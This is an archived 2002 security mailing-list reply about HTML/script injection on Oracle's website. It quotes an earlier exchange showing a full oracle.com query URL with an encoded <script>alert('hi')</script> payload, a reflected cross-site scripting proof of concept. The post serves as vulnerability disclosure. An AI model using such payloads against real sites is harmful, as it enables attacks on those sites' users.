Re: Oracle Databases Allow HTML/SQL injection

From: KF (dotslashat_private)
Date: Tue Apr 16 2002 - 11:58:17 PDT

Next message: TanaydIn 'HuzursuZ' $irin: "Re: [VulnWatch] greek characters buffer overflow, AGAIN!"

Previous message: KF: "Re: Oracle Databases Allow HTML/SQL injection"
In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
Next in thread: Jim Kovalchuk: "Re: Oracle Databases Allow HTML/SQL injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Looks like we stumbled on the same thing... Snosoft was gonna send this 
out with our april fools stuff...

--- Begin Forwarded message ----

On Mon, 1 Apr 2002, l0rt wrote:
> dots cross site scripting of oracle baby... ;o)  ain't he sexy.
> -l0rt- 

> > HEH
> >
> > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
> >
> > -KF

Next message: TanaydIn 'HuzursuZ' $irin: "Re: [VulnWatch] greek characters buffer overflow, AGAIN!"
Previous message: KF: "Re: Oracle Databases Allow HTML/SQL injection"
In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
Next in thread: Jim Kovalchuk: "Re: Oracle Databases Allow HTML/SQL injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 12:35:26 PDT